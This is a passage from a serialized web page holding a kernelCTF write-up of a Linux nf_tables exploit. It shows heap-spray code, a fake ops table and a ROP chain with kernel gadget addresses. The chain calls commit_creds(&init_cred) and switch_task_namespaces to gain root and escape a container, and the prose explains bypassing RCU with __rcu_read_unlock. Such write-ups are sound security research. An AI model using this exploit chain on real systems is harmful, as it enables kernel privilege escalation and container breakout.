wait_destroyer();\n    obj_spray(nl, 1, 1, rop, 0xb8);\n    fake_obj = (uint64_t *)getudata(nl, \"spray-3\");\n    DumpHex(fake_obj, 0xe8);\n    uint64_t rop_addr = fake_obj[9]; // udata ptr\n    printf(\"[*] ROP addr: 0x%lx\\n\", rop_addr);\n\n    // Point to fake ops\n    fake_obj[16] = rop_addr - 0x20; // Point ops to fake ptr table\n[...]\n    // Write ROP\n    puts(\"[*] Write ROP\");\n    deludata_spray(nl, 3, 1);\n    wait_destroyer();\n    udata_spray(nl, 0xe8, 4, 1, fake_obj);\n\n    // Takeover RIP\n    puts(\"[*] Takeover RIP\");\n    dump_obj(nl, \"spray-1\");\n[...]\n",[55739],{"type":28,"tag":98,"props":55740,"children":55741},{"__ignoreMap":7},[55742,55749,55757,55781,55828,55864,55871,55879,55911,55919,55927,55948,55956,55964,56028,56035,56043,56051,56058,56066,56100,56108,56115,56123,56130,56138,56171,56192],{"type":28,"tag":116,"props":55743,"children":55744},{"class":245,"line":246},[55745],{"type":28,"tag":116,"props":55746,"children":55747},{"style":266},[55748],{"type":33,"value":9986},{"type":28,"tag":116,"props":55750,"children":55751},{"class":245,"line":256},[55752],{"type":28,"tag":116,"props":55753,"children":55754},{"style":266},[55755],{"type":33,"value":55756},"    // Fake ops\n",{"type":28,"tag":116,"props":55758,"children":55759},{"class":245,"line":293},[55760,55765,55769,55773,55777],{"type":28,"tag":116,"props":55761,"children":55762},{"style":266},[55763],{"type":33,"value":55764},"    uint64_t *rop = calloc(29, ",{"type":28,"tag":116,"props":55766,"children":55767},{"style":339},[55768],{"type":33,"value":54946},{"type":28,"tag":116,"props":55770,"children":55771},{"style":266},[55772],{"type":33,"value":313},{"type":28,"tag":116,"props":55774,"children":55775},{"style":376},[55776],{"type":33,"value":55253},{"type":28,"tag":116,"props":55778,"children":55779},{"style":266},[55780],{"type":33,"value":1929},{"type":28,"tag":116,"props":55782,"children":55783},{"class":245,"line":361},[55784,55789,55793,55797,55801,55805,55810,55814,55819,55823],{"type":28,"tag":116,"props":55785,"children":55786},{"style":272},[55787],{"type":33,"value":55788},"    rop",{"type":28,"tag":116,"props":55790,"children":55791},{"style":266},[55792],{"type":33,"value":347},{"type":28,"tag":116,"props":55794,"children":55795},{"style":350},[55796],{"type":33,"value":353},{"type":28,"tag":116,"props":55798,"children":55799},{"style":266},[55800],{"type":33,"value":8333},{"type":28,"tag":116,"props":55802,"children":55803},{"style":370},[55804],{"type":33,"value":373},{"type":28,"tag":116,"props":55806,"children":55807},{"style":266},[55808],{"type":33,"value":55809}," kaslr_slide ",{"type":28,"tag":116,"props":55811,"children":55812},{"style":370},[55813],{"type":33,"value":2268},{"type":28,"tag":116,"props":55815,"children":55816},{"style":350},[55817],{"type":33,"value":55818}," 0xffffffff81988647",{"type":28,"tag":116,"props":55820,"children":55821},{"style":266},[55822],{"type":33,"value":48695},{"type":28,"tag":116,"props":55824,"children":55825},{"style":250},[55826],{"type":33,"value":55827}," // push rsi; jmp qword ptr [rsi + 0x39];\n",{"type":28,"tag":116,"props":55829,"children":55830},{"class":245,"line":387},[55831,55835,55839,55843,55847,55851,55855,55859],{"type":28,"tag":116,"props":55832,"children":55833},{"style":272},[55834],{"type":33,"value":55788},{"type":28,"tag":116,"props":55836,"children":55837},{"style":266},[55838],{"type":33,"value":347},{"type":28,"tag":116,"props":55840,"children":55841},{"style":350},[55842],{"type":33,"value":2794},{"type":28,"tag":116,"props":55844,"children":55845},{"style":266},[55846],{"type":33,"value":8333},{"type":28,"tag":116,"props":55848,"children":55849},{"style":370},[55850],{"type":33,"value":373},{"type":28,"tag":116,"props":55852,"children":55853},{"style":266},[55854],{"type":33,"value":55809},{"type":28,"tag":116,"props":55856,"children":55857},{"style":370},[55858],{"type":33,"value":2268},{"type":28,"tag":116,"props":55860,"children":55861},{"style":266},[55862],{"type":33,"value":55863}," NFT_CT_EXPECT_OBJ_TYPE;\n",{"type":28,"tag":116,"props":55865,"children":55866},{"class":245,"line":400},[55867],{"type":28,"tag":116,"props":55868,"children":55869},{"style":266},[55870],{"type":33,"value":9986},{"type":28,"tag":116,"props":55872,"children":55873},{"class":245,"line":614},[55874],{"type":28,"tag":116,"props":55875,"children":55876},{"style":266},[55877],{"type":33,"value":55878},"    // Send ROP in object udata\n",{"type":28,"tag":116,"props":55880,"children":55881},{"class":245,"line":631},[55882,55887,55891,55896,55901,55906],{"type":28,"tag":116,"props":55883,"children":55884},{"style":266},[55885],{"type":33,"value":55886},"    del_obj(",{"type":28,"tag":116,"props":55888,"children":55889},{"style":339},[55890],{"type":33,"value":53908},{"type":28,"tag":116,"props":55892,"children":55893},{"style":266},[55894],{"type":33,"value":55895},", \"",{"type":28,"tag":116,"props":55897,"children":55898},{"style":339},[55899],{"type":33,"value":55900},"spray",{"type":28,"tag":116,"props":55902,"children":55903},{"style":266},[55904],{"type":33,"value":55905},"-0",{"type":28,"tag":116,"props":55907,"children":55908},{"style":563},[55909],{"type":33,"value":55910},"\");\n",{"type":28,"tag":116,"props":55912,"children":55913},{"class":245,"line":665},[55914],{"type":28,"tag":116,"props":55915,"children":55916},{"style":563},[55917],{"type":33,"value":55918},"    wait_destroyer();\n",{"type":28,"tag":116,"props":55920,"children":55921},{"class":245,"line":713},[55922],{"type":28,"tag":116,"props":55923,"children":55924},{"style":563},[55925],{"type":33,"value":55926},"    obj_spray(nl, 1, 1, rop, 0xb8);\n",{"type":28,"tag":116,"props":55928,"children":55929},{"class":245,"line":750},[55930,55935,55939,55944],{"type":28,"tag":116,"props":55931,"children":55932},{"style":563},[55933],{"type":33,"value":55934},"    fake_obj = (uint64_t *)getudata(nl, \"",{"type":28,"tag":116,"props":55936,"children":55937},{"style":376},[55938],{"type":33,"value":55900},{"type":28,"tag":116,"props":55940,"children":55941},{"style":266},[55942],{"type":33,"value":55943},"-3",{"type":28,"tag":116,"props":55945,"children":55946},{"style":563},[55947],{"type":33,"value":55910},{"type":28,"tag":116,"props":55949,"children":55950},{"class":245,"line":779},[55951],{"type":28,"tag":116,"props":55952,"children":55953},{"style":563},[55954],{"type":33,"value":55955},"    DumpHex(fake_obj, 0xe8);\n",{"type":28,"tag":116,"props":55957,"children":55958},{"class":245,"line":796},[55959],{"type":28,"tag":116,"props":55960,"children":55961},{"style":563},[55962],{"type":33,"value":55963},"    uint64_t rop_addr = fake_obj[9]; // udata ptr\n",{"type":28,"tag":116,"props":55965,"children":55966},{"class":245,"line":847},[55967,55972,55976,55980,55984,55989,55994,55999,56003,56008,56013,56018,56023],{"type":28,"tag":116,"props":55968,"children":55969},{"style":563},[55970],{"type":33,"value":55971},"    printf(\"",{"type":28,"tag":116,"props":55973,"children":55974},{"style":266},[55975],{"type":33,"value":347},{"type":28,"tag":116,"props":55977,"children":55978},{"style":370},[55979],{"type":33,"value":4240},{"type":28,"tag":116,"props":55981,"children":55982},{"style":266},[55983],{"type":33,"value":8333},{"type":28,"tag":116,"props":55985,"children":55986},{"style":339},[55987],{"type":33,"value":55988},"ROP",{"type":28,"tag":116,"props":55990,"children":55991},{"style":339},[55992],{"type":33,"value":55993}," addr",{"type":28,"tag":116,"props":55995,"children":55996},{"style":266},[55997],{"type":33,"value":55998},": 0",{"type":28,"tag":116,"props":56000,"children":56001},{"style":339},[56002],{"type":33,"value":18939},{"type":28,"tag":116,"props":56004,"children":56005},{"style":266},[56006],{"type":33,"value":56007},"%",{"type":28,"tag":116,"props":56009,"children":56010},{"style":339},[56011],{"type":33,"value":56012},"lx",{"type":28,"tag":116,"props":56014,"children":56015},{"style":266},[56016],{"type":33,"value":56017},"\\",{"type":28,"tag":116,"props":56019,"children":56020},{"style":339},[56021],{"type":33,"value":56022},"n",{"type":28,"tag":116,"props":56024,"children":56025},{"style":563},[56026],{"type":33,"value":56027},"\", rop_addr);\n",{"type":28,"tag":116,"props":56029,"children":56030},{"class":245,"line":898},[56031],{"type":28,"tag":116,"props":56032,"children":56033},{"emptyLinePlaceholder":19},[56034],{"type":33,"value":1044},{"type":28,"tag":116,"props":56036,"children":56037},{"class":245,"line":907},[56038],{"type":28,"tag":116,"props":56039,"children":56040},{"style":563},[56041],{"type":33,"value":56042},"    // Point to fake ops\n",{"type":28,"tag":116,"props":56044,"children":56045},{"class":245,"line":981},[56046],{"type":28,"tag":116,"props":56047,"children":56048},{"style":563},[56049],{"type":33,"value":56050},"    fake_obj[16] = rop_addr - 0x20; // Point ops to fake ptr table\n",{"type":28,"tag":116,"props":56052,"children":56053},{"class":245,"line":1011},[56054],{"type":28,"tag":116,"props":56055,"children":56056},{"style":563},[56057],{"type":33,"value":9986},{"type":28,"tag":116,"props":56059,"children":56060},{"class":245,"line":1029},[56061],{"type":28,"tag":116,"props":56062,"children":56063},{"style":563},[56064],{"type":33,"value":56065},"    // Write ROP\n",{"type":28,"tag":116,"props":56067,"children":56068},{"class":245,"line":1038},[56069,56074,56078,56082,56086,56091,56096],{"type":28,"tag":116,"props":56070,"children":56071},{"style":563},[56072],{"type":33,"value":56073},"    puts(\"",{"type":28,"tag":116,"props":56075,"children":56076},{"style":266},[56077],{"type":33,"value":347},{"type":28,"tag":116,"props":56079,"children":56080},{"style":370},[56081],{"type":33,"value":4240},{"type":28,"tag":116,"props":56083,"children":56084},{"style":266},[56085],{"type":33,"value":8333},{"type":28,"tag":116,"props":56087,"children":56088},{"style":339},[56089],{"type":33,"value":56090},"Write",{"type":28,"tag":116,"props":56092,"children":56093},{"style":339},[56094],{"type":33,"value":56095}," ROP",{"type":28,"tag":116,"props":56097,"children":56098},{"style":563},[56099],{"type":33,"value":55910},{"type":28,"tag":116,"props":56101,"children":56102},{"class":245,"line":1047},[56103],{"type":28,"tag":116,"props":56104,"children":56105},{"style":563},[56106],{"type":33,"value":56107},"    deludata_spray(nl, 3, 1);\n",{"type":28,"tag":116,"props":56109,"children":56110},{"class":245,"line":1071},[56111],{"type":28,"tag":116,"props":56112,"children":56113},{"style":563},[56114],{"type":33,"value":55918},{"type":28,"tag":116,"props":56116,"children":56117},{"class":245,"line":1137},[56118],{"type":28,"tag":116,"props":56119,"children":56120},{"style":563},[56121],{"type":33,"value":56122},"    udata_spray(nl, 0xe8, 4, 1, fake_obj);\n",{"type":28,"tag":116,"props":56124,"children":56125},{"class":245,"line":1181},[56126],{"type":28,"tag":116,"props":56127,"children":56128},{"emptyLinePlaceholder":19},[56129],{"type":33,"value":1044},{"type":28,"tag":116,"props":56131,"children":56132},{"class":245,"line":1212},[56133],{"type":28,"tag":116,"props":56134,"children":56135},{"style":563},[56136],{"type":33,"value":56137},"    // Takeover RIP\n",{"type":28,"tag":116,"props":56139,"children":56140},{"class":245,"line":1254},[56141,56145,56149,56153,56157,56162,56167],{"type":28,"tag":116,"props":56142,"children":56143},{"style":563},[56144],{"type":33,"value":56073},{"type":28,"tag":116,"props":56146,"children":56147},{"style":266},[56148],{"type":33,"value":347},{"type":28,"tag":116,"props":56150,"children":56151},{"style":370},[56152],{"type":33,"value":4240},{"type":28,"tag":116,"props":56154,"children":56155},{"style":266},[56156],{"type":33,"value":8333},{"type":28,"tag":116,"props":56158,"children":56159},{"style":339},[56160],{"type":33,"value":56161},"Takeover",{"type":28,"tag":116,"props":56163,"children":56164},{"style":339},[56165],{"type":33,"value":56166}," RIP",{"type":28,"tag":116,"props":56168,"children":56169},{"style":563},[56170],{"type":33,"value":55910},{"type":28,"tag":116,"props":56172,"children":56173},{"class":245,"line":1262},[56174,56179,56183,56188],{"type":28,"tag":116,"props":56175,"children":56176},{"style":563},[56177],{"type":33,"value":56178},"    dump_obj(nl, \"",{"type":28,"tag":116,"props":56180,"children":56181},{"style":376},[56182],{"type":33,"value":55900},{"type":28,"tag":116,"props":56184,"children":56185},{"style":266},[56186],{"type":33,"value":56187},"-1",{"type":28,"tag":116,"props":56189,"children":56190},{"style":563},[56191],{"type":33,"value":55910},{"type":28,"tag":116,"props":56193,"children":56194},{"class":245,"line":1294},[56195],{"type":28,"tag":116,"props":56196,"children":56197},{"style":563},[56198],{"type":33,"value":9986},{"type":28,"tag":75,"props":56200,"children":56202},{"id":56201},"bypass-context-switch-in-rcu-critical-section",[56203],{"type":33,"value":56204},"Bypass context switch in RCU critical-section",{"type":28,"tag":29,"props":56206,"children":56207},{},[56208,56209,56214],{"type":33,"value":16275},{"type":28,"tag":98,"props":56210,"children":56212},{"className":56211},[],[56213],{"type":33,"value":54732},{"type":33,"value":56215}," operations are invoked from an RCU critical-section, which can be a problem for ROPing since we want to switch contexts to userland after executing our payload, which is illegal in RCU critical-sections.",{"type":28,"tag":29,"props":56217,"children":56218},{},[56219,56221,56228,56230,56236,56238,56244],{"type":33,"value":56220},"A workaround has been discussed before by D3v17 in a ",{"type":28,"tag":87,"props":56222,"children":56225},{"href":56223,"rel":56224},"https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-0461_mitigation/docs/exploit.md#post-rip",[91],[56226],{"type":33,"value":56227},"previous kernelCTF submission",{"type":33,"value":56229}," that basically consists in using memory write gadgets to overwrite the RCU lock in our ",{"type":28,"tag":98,"props":56231,"children":56233},{"className":56232},[],[56234],{"type":33,"value":56235},"task_struct",{"type":33,"value":56237}," before switching to userland. Although this works, I struggled to find useful gadgets but ended up coming up with an easier solution. There are kernel APIs specifically meant for acquiring/releasing the RCU lock, so we should be able to simply call ",{"type":28,"tag":98,"props":56239,"children":56241},{"className":56240},[],[56242],{"type":33,"value":56243},"__rcu_read_unlock()",{"type":33,"value":56245}," function and exit the RCU critical-section before switching contexts.",{"type":28,"tag":234,"props":56247,"children":56249},{"className":28765,"code":56248,"language":28767,"meta":7,"style":7},"    // ROP stage 1\n    int pos = 3;\n\n    rop[pos++] = kaslr_slide + __RCU_READ_UNLOCK;\n",[56250],{"type":28,"tag":98,"props":56251,"children":56252},{"__ignoreMap":7},[56253,56261,56285,56292],{"type":28,"tag":116,"props":56254,"children":56255},{"class":245,"line":246},[56256],{"type":28,"tag":116,"props":56257,"children":56258},{"style":250},[56259],{"type":33,"value":56260},"    // ROP stage 1\n",{"type":28,"tag":116,"props":56262,"children":56263},{"class":245,"line":256},[56264,56268,56273,56277,56281],{"type":28,"tag":116,"props":56265,"children":56266},{"style":376},[56267],{"type":33,"value":18740},{"type":28,"tag":116,"props":56269,"children":56270},{"style":266},[56271],{"type":33,"value":56272}," pos ",{"type":28,"tag":116,"props":56274,"children":56275},{"style":370},[56276],{"type":33,"value":373},{"type":28,"tag":116,"props":56278,"children":56279},{"style":350},[56280],{"type":33,"value":18762},{"type":28,"tag":116,"props":56282,"children":56283},{"style":266},[56284],{"type":33,"value":384},{"type":28,"tag":116,"props":56286,"children":56287},{"class":245,"line":293},[56288],{"type":28,"tag":116,"props":56289,"children":56290},{"emptyLinePlaceholder":19},[56291],{"type":33,"value":1044},{"type":28,"tag":116,"props":56293,"children":56294},{"class":245,"line":361},[56295,56299,56304,56308,56312,56316,56320,56324],{"type":28,"tag":116,"props":56296,"children":56297},{"style":272},[56298],{"type":33,"value":55788},{"type":28,"tag":116,"props":56300,"children":56301},{"style":266},[56302],{"type":33,"value":56303},"[pos",{"type":28,"tag":116,"props":56305,"children":56306},{"style":370},[56307],{"type":33,"value":50888},{"type":28,"tag":116,"props":56309,"children":56310},{"style":266},[56311],{"type":33,"value":8333},{"type":28,"tag":116,"props":56313,"children":56314},{"style":370},[56315],{"type":33,"value":373},{"type":28,"tag":116,"props":56317,"children":56318},{"style":266},[56319],{"type":33,"value":55809},{"type":28,"tag":116,"props":56321,"children":56322},{"style":370},[56323],{"type":33,"value":2268},{"type":28,"tag":116,"props":56325,"children":56326},{"style":266},[56327],{"type":33,"value":56328}," __RCU_READ_UNLOCK;\n",{"type":28,"tag":75,"props":56330,"children":56332},{"id":56331},"rop",[56333],{"type":33,"value":55988},{"type":28,"tag":29,"props":56335,"children":56336},{},[56337],{"type":33,"value":56338},"Most of the ROP chain to escape the container as root is business as usual:",{"type":28,"tag":2108,"props":56340,"children":56341},{},[56342,56353,56364],{"type":28,"tag":459,"props":56343,"children":56344},{},[56345,56351],{"type":28,"tag":98,"props":56346,"children":56348},{"className":56347},[],[56349],{"type":33,"value":56350},"commit_creds(&init_cred);",{"type":33,"value":56352}," Commit root credentials to our process",{"type":28,"tag":459,"props":56354,"children":56355},{},[56356,56362],{"type":28,"tag":98,"props":56357,"children":56359},{"className":56358},[],[56360],{"type":33,"value":56361},"task = find_task_by_vpid(1);",{"type":33,"value":56363}," Find the root process of our namespace",{"type":28,"tag":459,"props":56365,"children":56366},{},[56367,56373],{"type":28,"tag":98,"props":56368,"children":56370},{"className":56369},[],[56371],{"type":33,"value":56372},"switch_task_namespaces(task, &init_nsproxy);",{"type":33,"value":56374}," Move it to the root namespace",{"type":28,"tag":29,"props":56376,"children":56377},{},[56378,56380,56386,56388,56394,56396,56402,56404,56410,56412,56417,56419,56425],{"type":33,"value":56379},"However, I had a hard time finding gadgets to easily move the return value of ",{"type":28,"tag":98,"props":56381,"children":56383},{"className":56382},[],[56384],{"type":33,"value":56385},"find_task_by_vpid(1)",{"type":33,"value":56387}," passed through ",{"type":28,"tag":98,"props":56389,"children":56391},{"className":56390},[],[56392],{"type":33,"value":56393},"rax",{"type":33,"value":56395}," to ",{"type":28,"tag":98,"props":56397,"children":56399},{"className":56398},[],[56400],{"type":33,"value":56401},"rdi",{"type":33,"value":56403},". What I ended up going with was a ",{"type":28,"tag":98,"props":56405,"children":56407},{"className":56406},[],[56408],{"type":33,"value":56409},"push rax; jmp qword ptr [rsi + 0x66]; ret",{"type":33,"value":56411}," gadget, that allowed me to push the ",{"type":28,"tag":98,"props":56413,"children":56415},{"className":56414},[],[56416],{"type":33,"value":56393},{"type":33,"value":56418}," value onto the stack and then jump to a controlled location, where I stored a ",{"type":28,"tag":98,"props":56420,"children":56422},{"className":56421},[],[56423],{"type":33,"value":56424},"pop rdi; ret",{"type":33,"value":56426}," gadget to consume the new stack value and restore normal ROP execution. This very minor detour in the ROP flow looks like this:",{"type":28,"tag":2108,"props":56428,"children":56429},{},[56430,56435,56448],{"type":28,"tag":459,"props":56431,"children":56432},{},[56433],{"type":33,"value":56434},"We push the value onto the stack (stack pointer regresses)",{"type":28,"tag":459,"props":56436,"children":56437},{},[56438,56440,56446],{"type":33,"value":56439},"We jump to our \"trampoline\" gadget (",{"type":28,"tag":98,"props":56441,"children":56443},{"className":56442},[],[56444],{"type":33,"value":56445},"pop rdi; ret;",{"type":33,"value":56447}," location)",{"type":28,"tag":459,"props":56449,"children":56450},{},[56451,56456],{"type":28,"tag":98,"props":56452,"children":56454},{"className":56453},[],[56455],{"type":33,"value":56424},{"type":33,"value":56457}," consumes the value from the stack (progressing the stack pointer back to where it should be), and then we bounce back to the next gadget",{"type":28,"tag":234,"props":56459,"children":56461},{"className":28765,"code":56460,"language":28767,"meta":7,"style":7},"[...]\n    // commit_creds(&init_cred);\n    rop[pos++] = kaslr_slide + 0xffffffff8112c7c0; // pop rdi; ret;\n    rop[pos++] = kaslr_slide + INIT_CRED;\n    rop[pos++] = kaslr_slide + COMMIT_CREDS;\n\n    // task = find_task_by_vpid(1);\n    rop[pos++] = kaslr_slide + 0xffffffff8112c7c0; // pop rdi; ret;\n    rop[pos++] = 1;\n    rop[pos++] = kaslr_slide + FIND_TASK_BY_VPID;\n    rop[pos++] = kaslr_slide + 0xffffffff8102e2a6; // pop rsi; ret;\n    rop[pos++] = obj_ptr + 0xe0 - 0x66;            // rax -> rdi and resume rop\n    rop[pos++] = kaslr_slide + 0xffffffff81caed31; // push rax; jmp qword ptr [rsi + 0x66];\n\n    // switch_task_namespaces(task, &init_nsproxy);\n    rop[pos++] = kaslr_slide + 0xffffffff8102e2a6; // pop rsi; ret;\n    rop[pos++] = kaslr_slide + INIT_NSPROXY;\n    rop[pos++] = kaslr_slide + SWITCH_TASK_NAMESPACES;\n[...]\n",[56462],{"type":28,"tag":98,"props":56463,"children":56464},{"__ignoreMap":7},[56465,56472,56489,56534,56570,56606,56613,56621,56664,56695,56731,56776,56831,56876,56883,56891,56934,56970,57006],{"type":28,"tag":116,"props":56466,"children":56467},{"class":245,"line":246},[56468],{"type":28,"tag":116,"props":56469,"children":56470},{"style":266},[56471],{"type":33,"value":9986},{"type":28,"tag":116,"props":56473,"children":56474},{"class":245,"line":256},[56475,56480,56485],{"type":28,"tag":116,"props":56476,"children":56477},{"style":266},[56478],{"type":33,"value":56479},"    // commit_creds(&",{"type":28,"tag":116,"props":56481,"children":56482},{"style":272},[56483],{"type":33,"value":56484},"init_cred",{"type":28,"tag":116,"props":56486,"children":56487},{"style":266},[56488],{"type":33,"value":895},{"type":28,"tag":116,"props":56490,"children":56491},{"class":245,"line":293},[56492,56496,56500,56504,56508,56512,56516,56520,56525,56529],{"type":28,"tag":116,"props":56493,"children":56494},{"style":272},[56495],{"type":33,"value":55788},{"type":28,"tag":116,"props":56497,"children":56498},{"style":266},[56499],{"type":33,"value":56303},{"type":28,"tag":116,"props":56501,"children":56502},{"style":370},[56503],{"type":33,"value":50888},{"type":28,"tag":116,"props":56505,"children":56506},{"style":266},[56507],{"type":33,"value":8333},{"type":28,"tag":116,"props":56509,"children":56510},{"style":370},[56511],{"type":33,"value":373},{"type":28,"tag":116,"props":56513,"children":56514},{"style":266},[56515],{"type":33,"value":55809},{"type":28,"tag":116,"props":56517,"children":56518},{"style":370},[56519],{"type":33,"value":2268},{"type":28,"tag":116,"props":56521,"children":56522},{"style":350},[56523],{"type":33,"value":56524}," 0xffffffff8112c7c0",{"type":28,"tag":116,"props":56526,"children":56527},{"style":266},[56528],{"type":33,"value":48695},{"type":28,"tag":116,"props":56530,"children":56531},{"style":250},[56532],{"type":33,"value":56533}," // pop rdi; ret;\n",{"type":28,"tag":116,"props":56535,"children":56536},{"class":245,"line":361},[56537,56541,56545,56549,56553,56557,56561,56565],{"type":28,"tag":116,"props":56538,"children":56539},{"style":272},[56540],{"type":33,"value":55788},{"type":28,"tag":116,"props":56542,"children":56543},{"style":266},[56544],{"type":33,"value":56303},{"type":28,"tag":116,"props":56546,"children":56547},{"style":370},[56548],{"type":33,"value":50888},{"type":28,"tag":116,"props":56550,"children":56551},{"style":266},[56552],{"type":33,"value":8333},{"type":28,"tag":116,"props":56554,"children":56555},{"style":370},[56556],{"type":33,"value":373},{"type":28,"tag":116,"props":56558,"children":56559},{"style":266},[56560],{"type":33,"value":55809},{"type":28,"tag":116,"props":56562,"children":56563},{"style":370},[56564],{"type":33,"value":2268},{"type":28,"tag":116,"props":56566,"children":56567},{"style":266},[56568],{"type":33,"value":56569}," INIT_CRED;\n",{"type":28,"tag":116,"props":56571,"children":56572},{"class":245,"line":387},[56573,56577,56581,56585,56589,56593,56597,56601],{"type":28,"tag":116,"props":56574,"children":56575},{"style":272},[56576],{"type":33,"value":55788},{"type":28,"tag":116,"props":56578,"children":56579},{"style":266},[56580],{"type":33,"value":56303},{"type":28,"tag":116,"props":56582,"children":56583},{"style":370},[56584],{"type":33,"value":50888},{"type":28,"tag":116,"props":56586,"children":56587},{"style":266},[56588],{"type":33,"value":8333},{"type":28,"tag":116,"props":56590,"children":56591},{"style":370},[56592],{"type":33,"value":373},{"type":28,"tag":116,"props":56594,"children":56595},{"style":266},[56596],{"type":33,"value":55809},{"type":28,"tag":116,"props":56598,"children":56599},{"style":370},[56600],{"type":33,"value":2268},{"type":28,"tag":116,"props":56602,"children":56603},{"style":266},[56604],{"type":33,"value":56605}," COMMIT_CREDS;\n",{"type":28,"tag":116,"props":56607,"children":56608},{"class":245,"line":400},[56609],{"type":28,"tag":116,"props":56610,"children":56611},{"emptyLinePlaceholder":19},[56612],{"type":33,"value":1044},{"type":28,"tag":116,"props":56614,"children":56615},{"class":245,"line":614},[56616],{"type":28,"tag":116,"props":56617,"children":56618},{"style":250},[56619],{"type":33,"value":56620},"    // task = find_task_by_vpid(1);\n",{"type":28,"tag":116,"props":56622,"children":56623},{"class":245,"line":631},[56624,56628,56632,56636,56640,56644,56648,56652,56656,56660],{"type":28,"tag":116,"props":56625,"children":56626},{"style":272},[56627],{"type":33,"value":55788},{"type":28,"tag":116,"props":56629,"children":56630},{"style":266},[56631],{"type":33,"value":56303},{"type":28,"tag":116,"props":56633,"children":56634},{"style":370},[56635],{"type":33,"value":50888},{"type":28,"tag":116,"props":56637,"children":56638},{"style":266},[56639],{"type":33,"value":8333},{"type":28,"tag":116,"props":56641,"children":56642},{"style":370},[56643],{"type":33,"value":373},{"type":28,"tag":116,"props":56645,"children":56646},{"style":266},[56647],{"type":33,"value":55809},{"type":28,"tag":116,"props":56649,"children":56650},{"style":370},[56651],{"type":33,"value":2268},{"type":28,"tag":116,"props":56653,"children":56654},{"style":350},[56655],{"type":33,"value":56524},{"type":28,"tag":116,"props":56657,"children":56658},{"style":266},[56659],{"type":33,"value":48695},{"type":28,"tag":116,"props":56661,"children":56662},{"style":250},[56663],{"type":33,"value":56533},{"type":28,"tag":116,"props":56665,"children":56666},{"class":245,"line":665},[56667,56671,56675,56679,56683,56687,56691],{"type":28,"tag":116,"props":56668,"children":56669},{"style":272},[56670],{"type":33,"value":55788},{"type":28,"tag":116,"props":56672,"children":56673},{"style":266},[56674],{"type":33,"value":56303},{"type":28,"tag":116,"props":56676,"children":56677},{"style":370},[56678],{"type":33,"value":50888},{"type":28,"tag":116,"props":56680,"children":56681},{"style":266},[56682],{"type":33,"value":8333},{"type":28,"tag":116,"props":56684,"children":56685},{"style":370},[56686],{"type":33,"value":373},{"type":28,"tag":116,"props":56688,"children":56689},{"style":350},[56690],{"type":33,"value":4192},{"type":28,"tag":116,"props":56692,"children":56693},{"style":266},[56694],{"type":33,"value":384},{"type":28,"tag":116,"props":56696,"children":56697},{"class":245,"line":713},[56698,56702,56706,56710,56714,56718,56722,56726],{"type":28,"tag":116,"props":56699,"children":56700},{"style":272},[56701],{"type":33,"value":55788},{"type":28,"tag":116,"props":56703,"children":56704},{"style":266},[56705],{"type":33,"value":56303},{"type":28,"tag":116,"props":56707,"children":56708},{"style":370},[56709],{"type":33,"value":50888},{"type":28,"tag":116,"props":56711,"children":56712},{"style":266},[56713],{"type":33,"value":8333},{"type":28,"tag":116,"props":56715,"children":56716},{"style":370},[56717],{"type":33,"value":373},{"type":28,"tag":116,"props":56719,"children":56720},{"style":266},[56721],{"type":33,"value":55809},{"type":28,"tag":116,"props":56723,"children":56724},{"style":370},[56725],{"type":33,"value":2268},{"type":28,"tag":116,"props":56727,"children":56728},{"style":266},[56729],{"type":33,"value":56730}," FIND_TASK_BY_VPID;\n",{"type":28,"tag":116,"props":56732,"children":56733},{"class":245,"line":750},[56734,56738,56742,56746,56750,56754,56758,56762,56767,56771],{"type":28,"tag":116,"props":56735,"children":56736},{"style":272},[56737],{"type":33,"value":55788},{"type":28,"tag":116,"props":56739,"children":56740},{"style":266},[56741],{"type":33,"value":56303},{"type":28,"tag":116,"props":56743,"children":56744},{"style":370},[56745],{"type":33,"value":50888},{"type":28,"tag":116,"props":56747,"children":56748},{"style":266},[56749],{"type":33,"value":8333},{"type":28,"tag":116,"props":56751,"children":56752},{"style":370},[56753],{"type":33,"value":373},{"type":28,"tag":116,"props":56755,"children":56756},{"style":266},[56757],{"type":33,"value":55809},{"type":28,"tag":116,"props":56759,"children":56760},{"style":370},[56761],{"type":33,"value":2268},{"type":28,"tag":116,"props":56763,"children":56764},{"style":350},[56765],{"type":33,"value":56766}," 0xffffffff8102e2a6",{"type":28,"tag":116,"props":56768,"children":56769},{"style":266},[56770],{"type":33,"value":48695},{"type":28,"tag":116,"props":56772,"children":56773},{"style":250},[56774],{"type":33,"value":56775}," // pop rsi; ret;\n",{"type":28,"tag":116,"props":56777,"children":56778},{"class":245,"line":779},[56779,56783,56787,56791,56795,56799,56804,56808,56813,56817,56822,56826],{"type":28,"tag":116,"props":56780,"children":56781},{"style":272},[56782],{"type":33,"value":55788},{"type":28,"tag":116,"props":56784,"children":56785},{"style":266},[56786],{"type":33,"value":56303},{"type":28,"tag":116,"props":56788,"children":56789},{"style":370},[56790],{"type":33,"value":50888},{"type":28,"tag":116,"props":56792,"children":56793},{"style":266},[56794],{"type":33,"value":8333},{"type":28,"tag":116,"props":56796,"children":56797},{"style":370},[56798],{"type":33,"value":373},{"type":28,"tag":116,"props":56800,"children":56801},{"style":266},[56802],{"type":33,"value":56803}," obj_ptr ",{"type":28,"tag":116,"props":56805,"children":56806},{"style":370},[56807],{"type":33,"value":2268},{"type":28,"tag":116,"props":56809,"children":56810},{"style":350},[56811],{"type":33,"value":56812}," 0xe0",{"type":28,"tag":116,"props":56814,"children":56815},{"style":370},[56816],{"type":33,"value":50874},{"type":28,"tag":116,"props":56818,"children":56819},{"style":350},[56820],{"type":33,"value":56821}," 0x66",{"type":28,"tag":116,"props":56823,"children":56824},{"style":266},[56825],{"type":33,"value":48695},{"type":28,"tag":116,"props":56827,"children":56828},{"style":250},[56829],{"type":33,"value":56830},"            // rax -> rdi and resume 